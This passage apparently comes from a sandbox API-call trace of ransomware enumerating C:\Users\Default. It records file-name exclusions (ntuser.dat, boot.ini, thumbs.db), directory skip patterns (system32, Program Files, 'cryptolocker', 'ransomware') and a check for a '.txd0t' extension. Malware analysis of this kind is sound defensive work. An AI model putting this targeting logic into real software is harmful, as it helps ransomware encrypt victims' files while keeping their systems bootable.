dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.099] StrCmpW (psz1="..", psz2=".") returned 1 [0072.099] StrCmpW (psz1="..", psz2="..") returned 0 [0072.099] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.099] FindClose (in: hFindFile=0xec27f0 | out: hFindFile=0xec27f0) returned 1 [0072.099] GetProcessHeap () returned 0xe30000 [0072.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.099] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0072.099] StrCmpW (psz1="My Documents", psz2=".") returned 1 [0072.099] StrCmpW (psz1="My Documents", psz2="..") returned 1 [0072.099] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0072.099] StrCmpW (psz1="NetHood", psz2=".") returned 1 [0072.099] StrCmpW (psz1="NetHood", psz2="..") returned 1 [0072.099] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4aac40, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x19fa8eb, ftLastAccessTime.dwHighDateTime=0x1d5d811, ftLastWriteTime.dwLowDateTime=0x19fa8eb, ftLastWriteTime.dwHighDateTime=0x1d5d811, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0072.099] StrCmpW (psz1="NTUSER.DAT", psz2=".") returned 1 [0072.099] StrCmpW (psz1="NTUSER.DAT", psz2="..") returned 1 [0072.099] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.099] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.099] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="NTUSER.DAT", cchMax=1058 | out: psz1="C:\\Users\\Default\\NTUSER.DAT") returned="C:\\Users\\Default\\NTUSER.DAT" [0072.099] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0072.099] StrCmpW (psz1=".DAT", psz2=".txd0t") returned -1 [0072.099] StrCmpIW (psz1="NTUSER.DAT", psz2="bootsect.bak") returned 1 [0072.099] StrCmpIW (psz1="NTUSER.DAT", psz2="iconcache.db") returned 1 [0072.099] StrCmpIW (psz1="NTUSER.DAT", psz2="thumbs.db") returned -1 [0072.099] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransomware ") returned 1 [0072.099] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransom ") returned 1 [0072.099] StrCmpIW (psz1="NTUSER.DAT", psz2="debug.txt") returned 1 [0072.100] StrCmpIW (psz1="NTUSER.DAT", psz2="boot.ini") returned 1 [0072.100] StrCmpIW (psz1="NTUSER.DAT", psz2="desktop.ini") returned 1 [0072.100] StrCmpIW (psz1="NTUSER.DAT", psz2="autorun.inf") returned 1 [0072.100] StrCmpIW (psz1="NTUSER.DAT", psz2="ntuser.dat") returned 0 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT.LOG1", psz2=".") returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT.LOG1", psz2="..") returned 1 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT.LOG2", psz2=".") returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT.LOG2", psz2="..") returned 1 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7dab84ff, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855f639a, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", psz2=".") returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", psz2="..") returned 1 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ddd9675, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de71fdf, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0x855d0141, ftLastAccessTime.dwHighDateTime=0x1d2fa07, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~2.BLF")) returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2=".") returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2="..") returned 1 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~3.REG")) returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b716935, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b716935, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~4.REG")) returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0072.100] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0072.100] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0072.100] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0072.100] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0072.100] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.100] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.101] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Pictures", cchMax=1058 | out: psz1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="crypt_detect") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="cryptolocker") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="ransomware") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.101] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0072.101] GetProcessHeap () returned 0xe30000 [0072.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xece048 [0072.101] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Pictures", cchMax=1076 | out: psz1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0072.101] StrNCatW (in: psz1="C:\\Users\\Default\\Pictures", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Default\\Pictures\\*") returned="C:\\Users\\Default\\Pictures\\*" [0072.101] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0072.102] StrCmpW (psz1=".", psz2=".") returned 0 [0072.102] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.102] StrCmpW (psz1="..", psz2=".") returned 1 [0072.102] StrCmpW (psz1="..", psz2="..") returned 0 [0072.102] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.102] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0072.102] GetProcessHeap () returned 0xe30000 [0072.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.102] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0072.102] StrCmpW (psz1="PrintHood", psz2=".") returned 1 [0072.102] StrCmpW (psz1="PrintHood", psz2="..") returned 1 [0072.102] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0072.102] StrCmpW (psz1="Recent", psz2=".") returned 1 [0072.102] StrCmpW (psz1="Recent", psz2="..") returned 1 [0072.102] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0072.102] StrCmpW (psz1="Saved Games", psz2=".") returned 1 [0072.102] StrCmpW (psz1="Saved Games", psz2="..") returned 1 [0072.102] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.102] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.102] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Saved Games", cchMax=1058 | out: psz1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0072.102] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\system32\\") returned 0x0 [0072.102] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.102] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\system\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\local\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\boot\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\perflogs\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\programdata\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\drivers\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\wsus\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="crypt_detect") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="cryptolocker") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="ransomware") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\WINDOWS") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.103] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\Program Files") returned 0x0 [0072.103] GetProcessHeap () returned 0xe30000 [0072.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ba) returned 0xece048 [0072.103] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Saved Games", cchMax=1082 | out: psz1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0072.103] StrNCatW (in: psz1="C:\\Users\\Default\\Saved Games", psz2="\\*", cchMax=1082 | out: psz1="C:\\Users\\Default\\Saved Games\\*") returned="C:\\Users\\Default\\Saved Games\\*" [0072.103] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec24f0 [0072.104] StrCmpW (psz1=".", psz2=".") returned 0 [0072.104] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.104] StrCmpW (psz1="..", psz2=".") returned 1 [0072.104] StrCmpW (psz1="..", psz2="..") returned 0 [0072.104] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.104] FindClose (in: hFindFile=0xec24f0 | out: hFindFile=0xec24f0) returned 1 [0072.104] GetProcessHeap () returned 0xe30000 [0072.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.104] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0072.104] StrCmpW (psz1="SendTo", psz2=".") returned 1 [0072.104] StrCmpW (psz1="SendTo", psz2="..") returned 1 [0072.104] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0072.104] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0072.104] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0072.104] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: 